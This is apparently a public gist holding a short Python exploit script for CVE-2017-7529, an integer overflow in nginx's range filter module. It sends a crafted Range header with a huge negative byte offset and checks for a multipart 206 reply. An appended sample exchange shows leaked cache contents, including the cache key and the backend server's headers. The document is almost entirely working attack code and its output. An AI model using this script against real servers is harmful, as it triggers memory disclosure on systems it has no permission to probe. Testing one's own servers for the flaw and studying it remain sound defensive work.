@andripwn
Created April 20, 2020 16:53
Remote Integer Overflow Vulnerability #15
Nginx versions from 0.5.6 up to and including 1.13.2 are vulnerable to an integer overflow in the nginx range filter module, which can leak potentially sensitive information when triggered by a specially crafted request.
#!/usr/bin/python
# -*- coding:utf-8 -*-
# Nginx - Remote Integer Overflow Vulnerability
# CVE-2017-7529
import requests
import logging
import sys
# Module-wide logger; INFO level so the per-request status lines are emitted.
log = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
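def send_http_request(url, headers=None, timeout=8.0):
    """Issue a GET to *url* and return the ``requests`` response.

    Args:
        url: Target URL.
        headers: Optional mapping of extra request headers. A fresh dict is
            built per call when omitted, so callers never share (or
            accidentally mutate) a module-level default.
        timeout: Socket timeout in seconds, passed through to ``requests``.

    Returns:
        The ``requests.Response`` object, unconsumed.

    Raises:
        requests.RequestException: on connection failure or timeout.
    """
    # A mutable default (``headers={}``) is shared across calls; build a new
    # dict each time instead.
    request_headers = {} if headers is None else headers
    response = requests.get(url, headers=request_headers, timeout=timeout)
    # Log status and the advertised Server banner; the banner is what a
    # triager correlates with the affected version range.
    log.info("status: %s: Server: %s", response.status_code, response.headers.get('Server', ''))
    return response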
def exploit(url):
    """Probe *url* for CVE-2017-7529 (nginx range filter integer overflow).

    Sends one plain GET to learn the response Content-Length, then a second
    GET carrying a crafted Range header, and logs whether the reply looks
    like that of an affected server. The verdict is a heuristic: it keys
    only on a 206 status plus the literal "Content-Range" appearing in the
    response body, so false positives and false negatives are both possible.
    Nothing is returned; results go to the module logger.
    """
    log.info("target: %s", url)
    httpResponse = send_http_request(url)
    # Falls back to 0 when the server sends no Content-Length header.
    content_length = httpResponse.headers.get('Content-Length', 0)
    # int() raises ValueError if Content-Length is present but non-numeric.
    bytes_length = int(content_length) + 623
    # The variable is reused here: it now holds the Range header value
    # (two suffix byte-ranges derived from the measured length).
    content_length = "bytes=-%d,-9223372036854%d" % (bytes_length, 776000 - bytes_length)
    httpResponse = send_http_request(url, headers={ 'Range': content_length })
    # Heuristic verdict: 206 with "Content-Range" in the body (a multipart
    # byteranges reply) is reported as vulnerable; anything else is
    # inconclusive rather than a confirmed negative.
    if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:
        log.info("[+] Vulnerable to CVE-2017-7529")
    else:
        log.info("[?] Unknown Vulnerable")
# Script entry point: exactly one positional argument (the target URL) is
# required; otherwise print usage and exit non-zero.
if __name__ == '__main__':
    if len(sys.argv) == 2:
        exploit(sys.argv[1])
    else:
        print("[*] %s <url>" % sys.argv[0])
        sys.exit(1)
"""
GET /proxy/demo.png HTTP/1.1
Accept-Encoding: identity
Range: bytes=-17208,-9223372036854758792
Host: 127.0.0.1:8000
Connection: close
User-Agent: Python-urllib/2.7
HTTP/1.1 206 Partial Content
Server: nginx/1.13.1
Date: Mon, 14 Aug 2017 05:53:54 GMT
Content-Type: multipart/byteranges; boundary=00000000000000000002
Connection: close
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
X-Proxy-Cache: HIT
--00000000000000000002
Content-Type: image/png
Content-Range: bytes -623-16584/16585
.......<.Y......................lY....r:.Y.....@.`..v.q.."40c9-5547a060fdf00".................................................................................................................................................................................................................................................................
KEY: httpGET127.0.0.1/proxy/demo.png
HTTP/1.1 200 OK
Date: Mon, 14 Aug 2017 05:51:46 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
Accept-Ranges: bytes
Content-Length: 16585
Connection: close
Content-Type: image/png
"""